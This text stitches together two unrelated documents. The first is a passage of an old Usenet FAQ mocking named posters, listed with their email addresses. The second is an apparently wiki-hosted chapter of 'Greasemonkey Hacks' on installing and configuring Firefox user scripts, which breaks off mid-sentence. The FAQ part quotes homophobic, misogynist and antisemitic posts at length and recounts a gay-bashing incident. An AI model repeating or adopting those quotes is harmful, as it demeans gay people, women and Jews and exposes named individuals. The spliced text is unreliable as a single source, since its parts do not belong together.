author]'s email address? Pretty pleeeeeze?" on rec.arts.sf.* is likely to get you semi-toastily flamed as well. This may be slowly changing however... more companies/organizations are discovering that the net's a good place to get feedback or opinions, or to get volunteers (or even employees), and some (like Wizards of the Coast on rec.games.deckmaster) have a quite extensive net.presence, looking for reactions and/or helping people. But in general, creative-type famous people must spend much of their time creating, not wasting time on UseNet... 4.0 ______________________________________________ Lesser Lights (Honorable Mention): not all of these are loons (many are quite sane), but all are notable in more than one group to some degree, or notorious in one group. There are *far* too many odd people on the net to mention all of them, or even a fraction thereof; these are some of the ones that have stuck in *other* peoples' minds as ... distinctive. "Red-Headed Goddess": Contrib. post: I still want to nominate at least in lesser Loon status the "Red-Headed Goddess" that I saw on a.a.v and occasionally on sci.skeptic. Doesn't anyone but me remember her? She was able to post the most absolutely LOVELY gems of New-Age crossed with 1920's space-opera physics which she used to combat spoilsports like me who might inquire as to how intelligent life could exist on Venus. Her retorts were works of art, saddened by our unenlightened state, filled with "different vibrational states in the ether" and other buzzwords of poetic yet senseless nature. -- *May* be Kathy, kathy@vpnet.chi.il.us (Redheaded Goddess), sighted recently on talk.religion.newage; may not be. Waiting for further (dis)confirmation. Steven Fordyce (Deer are for dinner) and his ilk: Dedicated to proving that homosexuals should not be allowed to marry, because marriage is based solely on the possibility of reproduction and the needs of the government. He and several others like him fight a losing battle daily in alt.politics.homosexuality and alt.(fan.)rush-limbaugh, usually simultaneously (UseNet makes strange bed-fellows...). Is currently several thousand points behind solely on style and grace, not even mentioning logic; is seemingly not capable of altering his worldview. Has admitted he did not marry his wife for love, and doesn't seem to understand *why* this spurs his debating opponents on... Posts from stevef@bug.UUCP (Steven R Fordyce). Ted Kaldis (I can't understand why anyone should think I'm a "gay-basher"): Contrib. post: "Christian" homophobe. Most famous for the "tire iron incident", in which he lent his tire iron to some friends so that they could use it to bash some men at a gay bar. He bragged about this in alt.flame, then subsequently claimed he had had no idea what was going on. Supposedly nothing came of the incident; the police turned up or something. Believes that nobody outside the USA may comment on anything to do with the USA. Particularly hates Canadians who have the temerity to comment on US issues. Sexist, racist and misogynist to boot. Posted an article which listed (mostly obscene) slang terms for Asian women, and seemed surprised when he got flamed for it. Seems woefully unaware of his own reputation. Choice quotes: - - - cut here - - - cj@modernlvr.wpd.sgi.com (C J Silverio) writes: > [...] With a name like Valerie or Sally or Trixie, a woman on the net > is in for it. "Trixie" is a name for a female dog. (The four-legged variety.) > [...] You get Ted Kaldis responding to your posts with heavy-footed > witticism about "feminine logic being an oxymoron." [...] Darling, you're just wound a little too tight. And I know exactly what'll loosen you up. - - - cut here - - - - - - cut here - - - cramer@optilink.UUCP (Clayton Cramer) writes: > I've seen ads in the Sonoma State Star (SSU's student newspaper), that > specified that a gay employee was required for a graphics advertising > position with one of the gay resorts on the Russian River. Well they shouldn't have any trouble finding one! I worked in the ad industry for over a decade, and I can tell you for a fact that homo's seem to proliferate that industry. My best explanation is that they live in a fantasy world anyway (pretending that aberrant behavior is normal) and because of this they are drawn to a profession where an active imagination takes precedence over practical reality. - - - cut here - - - "If a man has sex with men, he's a homosexual -- and by definition is exhibiting a hate for humanity; if he carves them up afterwards, he is a homosexual who carries out his hate for humanity to the ultimate degree. [...] It is only to the depraved that the act of buggery represents an expression of affection." "Lesbian: a poorly-socialized female who is unable to enter into or maintain a relationship with a man, and who thus resorts to engaging in perverse sexual acts with other females." "I have the necessary qualifications to speak on behalf of Jesus." "That's easy. This is yet another example of feminine "logic" (truly an oxymoron if ever there was one)." "These kinds of remarks are wholly inappropriate and are the mark of a bigot." "I can't understand why anyone should think I'm a "gay-basher"." > I am surprised (and probably shouldn't be) that Ted Kaldis is still around. No you shouldn't. > Did he ever get his tire iron back? No. I had to go to the junkyard and pay a buck to get another one. -- Actually lucid for posts at a time, which puts him in the Sternlight category. -- He, of course, euphemistically referred to [the tire-iron incident] as "scaring some homosexuals". T*d once titled a post "SHUT UP CANADIAN AGITATOR!" for no good reason on (get this) soc.culture.canada. You're [also] forgetting his exceedingly pedantic harping about spelling mistakes, his claims he would vacation in Colorado because of the passing of Proposition 2 and his claims that he would move to Louisiana because they passed stringent anti-abortion laws. -- And his proud boast that he was moving to California to get a 6-figure salary. Never happened, what a surprise. And the time he bragged about his programming expertise, and proved it by producing a version of bubble sort which he had coded in uncommented 8086 assembler "for maximum speed and efficiency". -- Posts as kaldis@{remus|romulus}.rutgers.edu (Theodore A. Kaldis). Mikhail Zeleny (That goes completely against the categorical imperative!):. Seen on several different groups; try soc.culture.soviet, but mind the Zumabot ... Contrib. post: Michael Zeleny pops up all over the place. His kink is to post unbelievably long messages full of philosophical verbage which generally boil down to no content. His only `interesting' opinion is that homosexuality is immoral because it (in some way he can't define) precludes reproduction. Maybe he thinks the net will need more newbies in 18 years time. -- "No content" is a little strong, but it is clear that he's arguing for the sheer love of long pointless arguments. The last time I saw him drift into a real group, the first followup (from someone himself prone to long, relatively opaque and pedantic posts) was started with a warning that most people in the group should probably just ignore him and save the grief. Cameron Laird's beautiful summary of a few USEnet groups mentioned him: >>I think of it as a party held in very very large house. In one room people >>are drinking espresso and discussing translations of Rilke, while in another >>they're sucking nitrous out of a garbage bag and setting fire to a couch. >rec.arts.books: drinking espresso, and watching > M. Zeleny burn translations of Rilke. >misc.woodworking: should we burn the couch-maker, > because he used electricity? >soc.history: eat the garbage bag, inject nitrous > into anyone who looks like Rilke, and, anyway, > couches and espresso are glorious Turkish > inventions. >news.groups: no one should be permitted to say > "garbage bag", "fire", or "couch", because > newsgroups for those purposes already exist-- > and even if they don't, it was a democratic > decision. -- I think it would be fun to include an example of Zeleny's attempts at humor. Seeing Zeleny try to tell a joke is like watching Miss Manners try to limbo; you know it is not going to be done well, but it is amusing to see it attempted. There was a really good one on rec.arts.books about a week and a half ago; too bad I didn't archive it. Shall we start an Urban Legend saying that Zeleny is the same guy as "Fans-to-blow-toxic-waste-into-Latvia" Zhirinovsky? Or maybe he's the lost Russian twin of Dieter on the SNL "Shprockets" skits? ("The categorical imperative does not allow negative statements. So you see your attempts at humor are futile.") -- Zeleny will do anything for posterity. For some articles he wrote last October in a.p.h, he put the expiration date to be Dec 31, 1999. -- Posts as zeleny@oak.math.ucla.edu (Mikhail Zeleny). magoo/Gary Landers|Warren (The Great Gary L.)/The Bard, and other prepubescents everywhere: Generally all following the same pattern: flame and run away, or flame and stick around and never reply very sensibly to anything... A hazard of day-to-day lurking/posting on the gay or bi groups, or alt.flame - there's many more, like Chuck Whealton, but I think I'm gonna stop with The Bard, because the examples (like the posters) just get repetitive... The particular multi-handled person mentioned above seems to grow a new "handle" after each retreat... Contrib. post: Oh, he made an entrance here, I think it was during late summer, with stories focusing on young gay men, transvestites and orgies, where he made claims that "there was nothing so shocking as seeing another naked man." Every character except for the protagonist was portrayed as fucked up. The language was... passable. The first ones were fascinating to read; after that it became like watching the same carcrash over and over. The funny thing is that he doesn't dehumanize gay sexuality, but just sees us (oh crime) as `unamnly'. He then proceeded to define that in wonderfully circular defenitions, manly == having women == manly == etc. He seemed to be beyond reason or empathy. Furthermore, there is this subplot somewhere of a gay brother of his who died, and I think we are seeing guilt for ostracization of him somewhere. (By the way, don't ever get caught doing dishes, cooking or other household chores as a male person. He brands you `unmanly' for it). Wait, wait, wait, there's more, yeah: he saw being gay as taking the easy way out. You know, can't make it with a woman, so you turn to a a man. And lesbians don't exist, in his worldview. He never mentions them. By the end of it, he claimed to be here just for the flaming and having fun with the reactions, he really didn't mean it like that, he just wanted some attention and then proceeded to give a name by name account of people who responded to him and that he thought they were cool and brave fighters. Again, another person who thinks it's ok to just take queers as objects to flame for fun. Makes you wonder why they never go over to soc.culture.jewish or soc.culture.african-american or something. They could have heaps more fun there. So, is that recap enough, or do you want more? -- 'The Great Gary L.' is Gary Landers, who over summer 1993 terrorized alt.politics.homosexuality with his unbelievably crap posts on how to stop being homosexual. He also posted a lot of spoof fictional tales, as I recall. In September 1993 he posted that, owing to requests in a.p.h., he was going to spend a weekend 'being gay' and rattled off his own list of what exactly being gay meant to him. Strangely, when the time came to report the results, he was silent. Eventually (this must have been early October) he had so pissed everyone off that he must have been in most people's killfiles. In response to someone politely inviting him to leave he gave a hostage to fortune by saying he was well liked on a.p.h. and called a net.vote to determine whether he stayed or went. He lost by at least 10 posts to 0. The low number of posts asking him to leave was probably due to his ubiquitous killfile presence. Though he said he had actually won the vote, he did indeed go shortly after. -- [He didn't stay away very long, but re-appeared as The Bard...] The Bard posted from thebard@char.vnet.net, now from thebard@jabba.cybernetics.net, and has confirmed being Gary; Gary Landers posted from scoopnet@access.digex.net, and magoo from magoo@char.vnet.net (Magoo) (magoo also has confirmed being The Great Gary L.). (7/94) Gary Warren, hardcopy@char.vnet.net has just appeared, Keith Cochran ("Justified and Ancient"): A counterpart to the above several. On the seek-out-the-fundies-and-dissect- their-arguments-gleefully-with-flaming side; tends to bring abortion and/or gay rights into threads he's in. Likes to snipe at the alt.christnet (later christnet.*) groups (but had to cut back dramatically since Holonet started filtering them), and likes to crosspost to them, to talk.abortion or alt.abortion.inequity, to talk.religion.misc, and/or sometimes to talk.origins or alt.atheism (keeping things stirred up on all of them...). Also to nyx.misc, when the subject mutates to Colorado's Amendment #2, apparently partially accounting for its inflated percentages in the Arbitron ratings. Associate Professor of Religious Studies and Chair, University Sexual Discrimination Committee, for the University of Ediacara. Known in talk.abortion for discussing "aberrant sexual practices" (by their standards, anyway) and for being the unfortunate person Peter Nyikos decided to use to tell the world about his hemorrhoid problems. Keeper of the comp.databases.xbase.fox FAQ's, which says something. We're not sure what, but it says something. Posts as kcochran@nyx10.cs.du.edu (Keith "Justified And Ancient" Cochran). xibo (You're allowed. NOT! --X.): Kibo imitator. Title currently held by Sean "Xibo" Coates; apparently, "back when Kibo was kibo@mts.rpi.edu it was even a semi-rotating title". Not Allowed; one former holder of the title seems to have taken this seriously enough never to have posted. Apparently Head Wizard at (EVIL!)Mud. Further deponent knoweth not. Variations also existent: Scott "~ibo" Ramming, Jeremy "OS/2ibo" Reimer, Rich "mcmxciibo" Holmes (q.v.), Andrew "znribo" (varying pronunciations) Hime (who reposts interesting-to-him stuff in alt.cosuard, which recently was invaded by what seems to be the alt.1d crowd, finally fed up at all the test posts there [which was, after all, the raison d'etre of alt.1d: getting the test posts off of alt.3d ...]; they've since moved on), Anthony "SCHWAibo" Hobbs, Magnus "!kibo" Y Alvestad, Bill Marcum "beableibo" (although Andrew Bulhak claims to be the Beableibo), Headless "James `Kibo' Parry" Chicken, Lewis "McKibo" McCarthy, Craig "*ibo" Dickson, Joe "Hibo" George, d"d'ibo"kirchner, Defender of the ".ibo" Faith (ingram), Patrick ".*ibo", "kibof" Schaaf, Brian char _[]="\x69bo"; Chase, Rose Marie "AAAAEEEEIIIIbo" Holt, Jacob C "\nibo" Kesinger, Austin "Zibo" Loomis, possibly Rachel J. "asciibo" Perkins (opinions are divided). Also, very subtly, playing off Kibo's font fondness, 5150. Craig "*ibo" has the title to the -ibo namespace, and applications for an -ibofix must go to him; declarations are handled independently. -- From the alt.religion.kibology FAQ: "IS KIBO RELATED TO XIBO?" No. "WHAT'S A XIBO?" A bad bozo, who isn't allowed. "WHY DON'T YOU WANT TO TALK ABOUT XIBO?" I could if I wanted to. See, I'm allowed to. Xibo isn't allowed. As the saying goes, "You're allowed, unless you're Harry, Glass, Xibo, Spot, Sandro Wallach, Noah Friedman (after midnight), Jay Paul Chawla, or especially Patrick L. Obo." [Note late addition: "I do believe that [Andrew Beckwith (q.v.)] was never allowed, under the doctrine which clearly states the rules: 8.1.3a (617) People whose identity-fields formatted as standardized spec K112-41/J positive-match the regexp '^ANDREW B*$' shall have their allowedness status classified below level 'ALLOWED' but above level 'LEVEL BELOW NOT ALLOWED'. Identity-fields matching '^ANDY B*$' will be assigned allowedness levels on a case-by-case basis, the processing of which may only be expedited if the user comes through with the dough. -- K."] [Also: "I have decided to forgive Jay Paul Chawla for his past sins. I can afford to be magnaminous because I am no longer a mere net.personality or a net.legend but a major marketing phenomenon. And besides, forgiving and removing from a killfile are not the same thing. -- K."] [Also also, Kibo has also declared George W. Hayduke to be Not Allowed, for nominating Joel Furr and Sean Ryan for Kibo and Vice-Kibo, respectively.] "WHO'S XIBO?" A very bad bozo, who still isn't allowed, no matter how much he whines about it. "WHERE'S XIBO?" Sittin' in his nowhere land, making all his nowhere .plans for nobody. "WHY IS XIBO SO FAR AWAY FROM KIBO?" Because they're on opposite sides of the real world. -- Contrib. post: (from Kibo) When Sean "Xibo" Coates visited Boston a couple years back, he took the MTA, and I can prove it--there's no MTA here any more because Xibo took it. Xibo is evil! In a good way, though. Scott "~ibo" Ramming has been formulating a secret plan to rename the MBTA to the META for some time, which would allow the trains to emply "fuzzy" logic so that any train could stop at any station at any time, even ones that hadn't yet been built. I prefer this to A. J. Deutsch's "Subway Named Moebius" concept, in which one simply writes a short story about London subways and then changes all the station names to Boston ones randomly when reprinting the story so that key action occurs in nonexistent places. -- May post as Xibo <xibo@ritz.mordor.com>. This is uncertain. Dan Gannon (q.v.) has followers and imitators: -- Hermann: Net-pseudonym of Milton John Kleim, Jr. Posts as hermann@TIGGER.STCLOUD.MSUS.EDU; also seen on alt.skinheads, along with: -- Pendragon (White Pride! White Power!): posts from delphi.com. Sigh. -- Ross Vicksell: can be seen on alt.revisionism. -- Vitaca Milut (Pronounced: Vitacha Milut) and Zeljko Jericevic: are attempting to link Serbo-Croatia with various Nazi war horrors. Newcomers (as of 12/93); Vitaca was posting from an10805@anon.penet.fi and Zeljko from uwaterloo; Vitaca is *now* posting through an anonymous service that *appears* to be administered by John Palmer (q.v.) (it's on tygra.michigan.com...). -- Martin S. Singleton (Lots of people suffer in wars- so what if Jews do too): another rabid anti-Semite... from alt.revisionism. Quotes: >What is so special about Jews that when they die like other people there has to >be SUCH A BIG UPROAR ABOUT IT? >I've never heard any Jews bemoaning the plight of the complete extermination- >in the most grisly ways of perfectly peaceful people, like cutting off there >hands and feet and roasting them slowly over hot coals- of the Pygmy >population of Tasmania in the nineteenth century. >What about what the Jews are doing to the Palestinians? Do you think they like >to be tortured in the Isreali [sic] prisons and jails with no due process of >law, of which you profess yourself a proponent, while at the same time you are >probably a duel [sic] citizen of Isreal and the US? >Stop harassing me, you wolf in a sheep's pelt pulled tightly around you while >you lie in wait for your prey. Another quote: >Why don't you filthy swine stop tormenting me with your libel? Now even that >'ole "Nazi"-hunter, Ken Mcvay, is assaulting me with his propagandized lies. >Stop bludgeoning me with your hollow-cause. >Fortunately help is on its way. To the Fourth Reich: if you need more raw >material for heavy industry, try South Afrika. How about Oberkommando von >Kalifornia? >Les rad, these mongrels are getting on my nerve. >World War III will save the human race from America and the Jews. >Hooray for the Great German Nation!!!! Posts as martin@rahul.net (Martin S. Singleton). Marc Barrett (that guy in comp.amiga.sys.advocacy): spins tales of doom, trashes Amigas. His answer to every question is "Throw your Amigas and DOS machines away and buy a MAC", but he doesn't own a machine. -- "I refuse to acknowlege the existance of the Mac vs. MS-DOS, VMS vs. UNIX, and Amiga vs. Everyone flamers." ---Bill "final authority on Loons" VanHorne Minas Spetzakis: Contrib. post: How about Minas Spetzakis, star of stage, screen, and rec.humor? I got to where I could recognize his first name in rot13 (Zvanf) before I gave up reading noise-ridden rec.humor to free up time to read other noise-ridden groups. -- Ah Minas! (I thought it was Spitakis, but you probably know better than me.) Star of rec.humor.english.as.a.second.language. Made a brief appearance (what? about 4 years ago?), and soon became a part of the folklore of rec.humor. Any really unfunny joke, told very badly, was soon greeted with "Minas? Is that you?", no matter who told it. (Much like the references to Sven in a.f.w these days, but with Sven it's just good natured fun.) He wasn't a loon, but he did become part of the group's folklore. This is something I've noticed: each group (or conglomeration of groups) has its own folklore, about the poster from the past (or present) who everybody talks about and knows about, but people outside that group have no clue about. -- Roy Crabtree: Contrib. posts: Just one more net.loon occurred to me-Roy Crabtree, he of the text editor that makes everything he writes look like experimental free verse, and who cannot be dissuaded of his belief that insect vectors have played a significant role in AIDS transmission (the source of a much-longer-than-necessary thread on alt.conspiracy last spring). -- Crabtree is a definite winner: remember his campaign accusing Ted Frank of "obversion", whatever the hell that means to him? -- Apparently to be found in misc.legal, following up Ted Frank's posts with the aforesaid editor... K*nt Pa*l D*lan (Kent Paul Dolan) (you foolish child, I have more intellect in my ..etc, etc): Contrib. post: What about that man from xanth, Kent Paul Dolan ? While not strictly a net.loon, K*nt has probably pissed off more of the net than most with his bombastic insulting style and unshakable beliefs. I last saw him in talk.politics.drugs about two years ago - any recent sightings ? -- Oh, definitely. K*nt's claim to infamy was the rec.arts.sf-lovers reorganization of late 1991, for which he was the vote-taker; any survivors of that fiasco will attest to his warm, diplomatic style and high ethical standards. [Not!] -- A mention of the Grand sf-lovers reorg fiasco just brought back memories of K*nt P*l D*lan... I hardly dare to type his name out in full, Kent Paul Dolan. He was the vote - taker for the first attempt of rec.arts.sf-lovers in 1991. His vitriolic comments and threats to throw out what he considered "ballot box stuffing" votes led to the first immediate revote in the history of Usenet because of procedural problems, and to the eventual creation of the Usenet Volunteer Votetakers. Also, he served as the inspiration to one of the best pieces of net.humor ever published, the Usenet Flame Olympics (or somesuch, it's been some time) of 1991. Shortly after the revote was called, he announced that he had better things to do with his life, was about to get married, and vanished off the net; I have never seen him again, nor heard anybody who has. BTW... does anybody still have a copy of the Usenet Olympics around? This piece of now nearly ancient net history certainly would bear a repost ;-) -- Kent was apparently a sufferer from monopolar depression; he had treatment, and was released as "improved, not cured"; a copy of the UseNet Olympics is available as a miniFAQ, and can also be found at ocf.berkeley.edu, /pub/Usenet_Olympics ... he also had a text editor, apparently, which posted in columns about 20 characters wide (see said miniFAQ...). Peter Trei: [From Peter himself, in a list of net.loon nominees] last, and probably least... Peter Trei Monomaniac who greps most of Usenet for mentions of Freemasonry, and posts corrections if he feels the fraternity is being slighted. Sporadically publishes the Masonic Digest on a mailing list. Not too good at answering his email. At least he has a sense of humor... Posts as <ptrei@mitre.org>. -- Mike Dahmus ("Linux sux! Linux sux! OS/2 iz g00d 4 U!"): Often seen on the comp.* groups and alt.folklore.computers. Argues at length (about NextStep, Unix, OS/2, etc.), and crossposts. Also posts to alt.religion.kibology, rec.sport.basketball, and rec.sport.football.college; good at baiting flames, to the point of being the curator of the rec.sport.football.college Hall o' Bait (they call trolling "fishing" there for some odd reason). Has at least one archenemy, Andrew Bulhak (q.v.), whom he calls "Lumpy (tm) 'Andrew' Bulhak"; Bruce Ediger has also been mentioned. Works for IBM at last report. Has some people convinced he's convinced Penn State is God's gift to the US athletics conferences, and that OS/2 R00LZ... Has his own alt.fan group. Tied for eighth place in the Kibo election. Will argue st00pidly with NextStep advocates. May or may not be Not Allowed at the moment. Contrib. post: And then there's Mike Dahmus, who claims that UNIX sucks and everything other than OS/2 is trash and that UNIX's "mv" command is brane dam3jd because it doesn't refuse to move files across drives. -- Sigh. What a load of Bulhak. The actual reasoning was - "as long as OS/2 is stuck with the concept of drives, and as long as it has a dynamic swapfile, it's probably a good idea that 'move' doesn't let you move across drives." -- Posts as mike@schleppo.bocaraton.ibm.com / miked@inca.gate.net (Mike Dahmus). Compilation copyright (only) dbd@panacea.phys.utk.edu (David DeLaney); this does not claim that individual contributors' copyrights have been transferred, only that the compilation and original portions thereof are copyright. Please feel free to distribute freely, charging no-one. [ Usenet FAQs | Web FAQs | Documents | RFC Index ]
http://www.faqs.org/faqs/net-legends-faq/part2/
CC-MAIN-2015-06
refinedweb
11,918
65.83
73086/how-to-temporarily-disable-foreign-key-constraint-in-mysql I have two Django models, each with a ForeignKey to the other one. Deleting instances of a model returns an error because of the ForeignKey constraint: cursor.execute("DELETE FROM myapp_item WHERE n = %s", n) transaction.commit_unless_managed() #a foreign key constraint fails here cursor.execute("DELETE FROM myapp_style WHERE n = %s", n) transaction.commit_unless_managed() Is it possible to temporarily disable constraints in MySQL? Hello @kartik, To turn off foreign key constraint globally, do the following: SET GLOBAL FOREIGN_KEY_CHECKS=0; and remember to set it back when you are done SET GLOBAL FOREIGN_KEY_CHECKS=1; NOTE: You should only do this when you are doing single user mode maintenance. As it might resulted in data inconsistency. For example, it will be very helpful when you are uploading large amount of data using a mysqldump output Hope it helps!! Thank You!! connect mysql database with python import MySQLdb db = ...READ MORE You can use QtCore.QTimer class Example(QWidget): def __init__(self, app): QWidget.__init__(self) QTimer.singleShot(0, ...READ MORE You can use '\n' for a next ...READ MORE calculate square root in python >>> import math ...READ MORE Hi, there is only that way and ...READ MORE Hi all, with regard to the above ...READ MORE Hello @kartik, Let's say you have this important ...READ MORE Hello @kartik, You can use the add filter: {{ object.article.rating_score|add:"-100" }} Thank ...READ MORE Hello @kartik, You can follow this snippet below: MAYBECHOICE ...READ MORE Hello @kartik, You could keep using viewsets.ModelViewSet and define on your ...READ MORE OR At least 1 upper-case and 1 lower-case letter Minimum 8 characters and Maximum 50 characters Already have an account? Sign in.
https://www.edureka.co/community/73086/how-to-temporarily-disable-foreign-key-constraint-in-mysql
CC-MAIN-2022-21
refinedweb
290
59.6
Greasemonkey Hacks/Getting Started From WikiContent Revision as of 20:40, 27 August 2008 Hacks 1–12: Introduction The first thing you need to do to get started with Greasemonkey is install it. Open Firefox and go to. Click the Install Greasemonkey link. Firefox will warn you that it prevented this site from installing software, as shown in Figure 1-1. Click the Edit Options button to bring up the Allowed Sites dialog, as shown in Figure 1-2. Click the Allow button to add the Greasemonkey site to your list of allowed sites; then click OK to dismiss the dialog. Now, click the Install Greasemonkey link again, and Firefox will pop up the Software Installation dialog, as shown in Figure 1-3. Click Install Now to begin the installation process. After it downloads, quit Firefox and relaunch it to finish installing Greasemonkey. Now that that's out of the way, let's get right to it. Install a User Script Greasemonkey won't do anything until you start installing user scripts to customize specific web pages. A Greasemonkey user script is a single file, written in JavaScript, that customizes one or more web pages. So, before Greasemonkey can start working for you, you need to install a user script. Tip Many user scripts are available at the Greasemonkey script repository:. This hack shows three ways to install user scripts. The first user script I ever wrote was called Butler. It adds functionality to Google search results. Installing from the Context Menu Here's how to install Butler from the context menu: - Visit the Butler home page () to see a brief description of the functionality that Butler offers. - Right-click (Control-click on a Mac) the link titled "Download version…" (at the time of this writing, Version 0.3 is the latest release). - From the context menu, select Install User Script…. - A dialog titled Install User Script will pop up, displaying the name of the script you are about to install (Butler, in this case), a brief description of what the script does, and a list of included and excluded pages. All of this information is taken from the script itself [Hack #2]. - Click OK to install the user script. If all went well, Greasemonkey will display the following alert: "Success! Refresh page to see changes." Now, search for something in Google. In the search results page, there is a line at the top of the results that says "Try your search on: Yahoo, Ask Jeeves, AlltheWeb…" as shown in Figure 1-4. There is also a banner along the top that says "Enhanced by Butler." All of these options were added by the Butler user script. Installing from the Tools Menu My Butler user script has a home page, but not all scripts do. Sometimes the author posts only the script itself. You can still install such scripts, even if there are no links to right-click. Visit. You will see the Butler source code displayed in your browser. From the Tools menu, select Install User Script…. Greasemonkey will pop up the Install User Script dialog, and the rest of the installation is the same as described in the previous section. Editing Greasemonkey's Configuration Files Like most Firefox browser extensions, Greasemonkey stores its configuration files in your Firefox profile directory. You can install a user script manually by placing it in the right directory and editing the Greasemonkey configuration file with a text editor. First you'll need to find your Firefox profile directory, which is harder than it sounds. The following list, from Nigel MacFarlane's excellent Firefox Hacks (O'Reilly), shows where to find this directory on your particular system: - Single-user Windows 95/98/ME - C:\Windows\Application Data\Mozilla\Firefox - Multiuser Windows 95/98/ME - C:\Windows\Profiles\%USERNAME%\Application Data\Mozilla\Firefox - Windows NT 4.x - C:\Winnt\Profiles\%USERNAME%\Application Data\Mozilla\Firefox - Windows 2000 and XP - C:\Documents and Settings\%USERNAME%\Application Data\Mozilla\Firefox - Unix and Linux - ~/.mozilla/firefox - Mac OS X - ~/Library/Application Support/Firefox Within your Firefox directory is your Profiles directory, and within that is a randomly named directory (for security reasons). Within that is a series of subdirectories: extensions/{e4a8a97b-f2ed-450b-b12d-ee082ba24781}/chrome/greasemonkey/content/scripts/. This final scripts directory contains all your installed user scripts, as well as a configuration file named config.xml. Here's a sample config.xml file: <UserScriptConfig> <Script filename="bloglinesautoloader.user.js" name="Bloglines Autoloader" namespace="" description="Auto-display all new items in Bloglines (the equivalent of clicking the root level of your subscriptions)" enabled="true"> <Include>*</Include> <Include>*</Include> </Script> <Script filename <Include>.*/search*</Include> </Script> <Script filename="mailtocomposeingmail.user.js" name="Mailto Compose In GMail" namespace="" description="Rewrites "mailto:" links to GMail compose links" enabled="true"> <Include>*</Include> <Exclude></Exclude> </Script> </UserScriptConfig> To install a new script, simply copy it to this scripts directory and add a <Script> entry like the other ones in config.xml. The <Script> element has five attributes: filename, name, namespace, description, and enabled. Within the <Script> element you can have multiple <Include> and <Exclude> elements, as defined in "Provide a Default Configuration" [Hack #2]. For example, to manually install the Butler user script, copy the butler.user.js file into your scripts directory, and then add this XML snippet to config.xml, just before </UserScriptConfig>: <Script filename="butler.user.js" name="Butler" namespace="" description="Link to competitors in Google search results" enabled="true"> <Include>*</Include> <Exclude>http://*.google.*/*</Exclude> </Script> Tip A user script's filename must end in .user.js. If you've gotten the file extension wrong, you won't be able to right-click the script's link and select Install User Script…from the context menu. You won't even be able to visit the script itself and select Install User Script…from the Tools menu. Provide a Default Configuration User scripts can be self-describing; they can contain information about what they do and where they should run by default. Every user script has a section of metadata, which tells Greasemonkey about the script itself, where it came from, and when to run it. You can use this to provide users with information about your script, such as its name and a brief description of what the script does. You can also provide a default configuration for where the script should run: one page, one site, or a selection of multiple sites. The Code Save the following user script as helloworld.user.js: Example: Hello World // ==UserScript== // @name Hello World // @namespace // @description example script to alert "Hello world!" on every page // @include * // @exclude* // @exclude* // ==/UserScript== alert('Hello world!'); There are five separate pieces of metadata here, wrapped in a set of Greasemonkey-specific comments. Wrapper. Name Within the metadata section, the first item is the name: // @name Hello World, it defaults to the filename of the user script, minus the .user.js extension. Namespace Next comes the namespace: // directivesuser scripts@namespace@namespace This is a URL, which Greasemonkey uses to distinguish user scripts that have the same name but are written by different authors. If you have a domain name, you can use it (or a subdirectory) as your namespace. Otherwise, you can use a tag: URI. Tip Learn more about tag: URIs at. @namespace is optional. If present, it can appear only once. If not present, it defaults to the domain from which the user downloaded the user script. Tip You can specify the items of your user script metadata in any order. I like @name, @namespace, @description, @include, and finally @exclude, but there is nothing special about this order. Description Next comes the description: // @description example script to alert "Hello world!" on every, it defaults to an empty string. Tip Though @description is not mandatory, don't forget to include it. Even if you are writing user scripts only for yourself, you will eventually end up with dozens of them, and administering them all in the Manage User Scripts dialog will be much more difficult if you don't include a description. URL Directives The next three lines are the most important items (from Greasemonkey's perspective). The @include and @exclude directives give a series of URLs and wildcards that tell Greasemonkey where to run this user script: // @include * // @exclude* // @exclude* The @include and @exclude directives share the same syntax. They can be a URL, a URL with the * character as a simple wildcard for part of the domain name or path, or simply the * wildcard character by itself. In this case, we are telling Greasemonkey to execute the Hello World script on all sites except and. Excludes take precedence over includes, so if you went to, the user script would not run. The URL matches the @include * (all sites), but it would be excluded because it also matches @exclude*. @include and @exclude are optional. You can specify as many included and excluded URLs as you like, but you must specify each on its own line. If neither is specified, Greasemonkey will execute your user script on all sites (as if you had specified @include *). Master the @include and @exclude Directives Describing exactly where you want your user script to execute can be tricky. As described in "Provide a Default Configuration" [Hack #2], Greasemonkey executes a user script based on @include and @exclude parameters: URLs with * wildcards that match any number of characters. This might seem like a simple syntax, but combining wildcards to match exactly the set of pages you want is trickier than you think. Matching with or Without the www. Prefix Here's a common scenario: a site is available at and. The site is the same in both cases, but neither URL redirects to the other. If you type example.com in the location bar, you get the site at. If you visit, you get exactly the same site, but the location bar reads. Let's say you want to write a user script that runs in both cases. Greasemonkey makes no assumptions about URLs that an end user might consider equivalent. If a site responds on both and, you need to declare both variations, as shown in this example: @include* @include* Matching All Subdomains of a Site Here's a slightly more complicated scenario. Slashdot is a popular technical news and discussion site. It has a home page, which is available at both and. But it also has specialized subdomains, such as,, and so forth. Say you want to write a user script that runs on all these sites. You can use a wildcard within the URL itself to match all the subdomains, like this: @include* @include http://*.slashdot.org/* The first line matches when you visit. The second line matches when you visit (the * wildcard matches www). The second line also matches when you visit or; the * wildcard matches apache and apple, respectively. Matching Different Top-Level Domains of a Site Now things get really tricky. Amazon is available in the United States at. (Because visibly redirects you to, we won't need to worry about matching both.) But Amazon also has country-specific sites, such as in England, in Japan, and so forth. If you want to write a user script that runs on all of Amazon's country-specific sites, there is a special type of wildcard, .tld, that matches all the top-level domains, as shown in the following example: @include* This special syntax matches any top-level domain: .com, .org, .net, or a country-specific domain, such as .co.uk or .co.jp. Greasemonkey keeps a list of all the registered top-level domains in the world and expands the .tld wildcard to include each of them. Tip You can find out more about the available top-level domains at. Deciding Between * and http://* One final note, before we put the @include and @exclude issue to bed. If you're writing a user script that applies to all pages, there are two subtly different ways to do that. Here's the first way: @include * This means that the user script should execute absolutely everywhere. If you visit a web site, the script will execute. If you visit a secure site (one with an https:// address), the script will execute. If you open an HTML file from your local hard drive, the script will execute. If you open a blank new window, the script will execute (since technically the "location" of a blank window is about:blank). This might not be what you want. If you want the script to execute only on actual remote web pages "out there" on the Internet, you should specify the @include line differently, like this: @include http://* This means that the user script will execute only on remote web sites, whose address starts with http://. This will not include secure web sites, such as your bank's online bill payment site, because that address starts with https://. If you want the script to run on both secure and standard web sites, you'll need to explicitly specify both, like so: @include http://* @include https://* Prevent a User Script from Executing You can disable a user script temporarily, disable all user scripts, or uninstall a user script permanently. Once you have a few user scripts running, you might want to temporarily disable some or all of them. There are several different ways to prevent a user script from running. Disabling a User Script Without Uninstalling It The easiest way to disable a user script is in the Manage User Scripts dialog. Assuming you installed the Butler user script [Hack #1], you can disable it with just a few clicks: - From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog. - In the left pane of the dialog is a list of 